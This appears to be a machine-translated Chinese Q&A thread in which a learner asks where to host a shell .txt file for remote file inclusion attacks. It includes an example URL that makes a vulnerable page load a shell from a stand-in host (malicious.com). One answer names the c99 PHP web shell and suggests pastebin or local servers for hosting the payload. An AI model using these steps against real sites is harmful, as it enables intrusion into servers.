如何上传.txt文件用于RFI/LFI？

Question

所以我正在学习RFI，LFI，还有一个简单的问题。许多示例显示了如何将PHP文件插入页面以提取不同的信息。我的问题是我在哪里上传这个.txt文件？例如，如您所见：

http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt

这是为了我的学习，我搜索了很多，但无法理解这件简单的事情。有专门的网站吗？

谢谢。

Answer 1

你会把这个文本文件上传到一个被遗弃的俄罗斯服务器上，你可以通过Tor访问这个服务器，并从一家网吧里黑出anonymouse代理程序，在那里你不需要注册商店的老板，而且没有日志记录，万圣节时你穿着外套，戴着山羊面具。

谷歌为"c99 php“。

如果将PHP代码放在txt文件中，放入配置了php的服务器上的PHP文件中，它将在前面呈现。大约几年前，你可以谷歌搜索网站，并发现每页5个易受攻击的网站。PHP通过禁用远程文件包含(通过和其他安全增强功能)来反击。

在99%的服务器上，include('http://www.malicious.com/shell.txt');已经不可能了。

PHP http://www.vulnerable.com/test.php?file=将是您想要黑的文件。

算了吧..。RFI已经过时了，而且有很多更酷的破解方法，主要是SQL注入或CSF。

为了进行测试，文件可以上传到任何地方，自由空间，本地服务器( Google : xampp，wampserver)，Google，甚至可以上传您想要测试的站点，例如http://www.vulnerable.com/test.php?file=http://www.vulnerable.com/shell.txt。

为了简单起见，您也可以尝试pastebin.com：http://pastebin.com/，然后找到粘贴文本的原始链接，如：http://pastebin.com/raw.php?i=GK9m8dAL

Answer 2

如果我对你的理解是正确的:你所展示的只是一个例子。它演示了php脚本"test.php“可能是一个漏洞，因为它可能被"shell.txt”(RFI)滥用。

"www.malicious.com“不是”真正的“地址。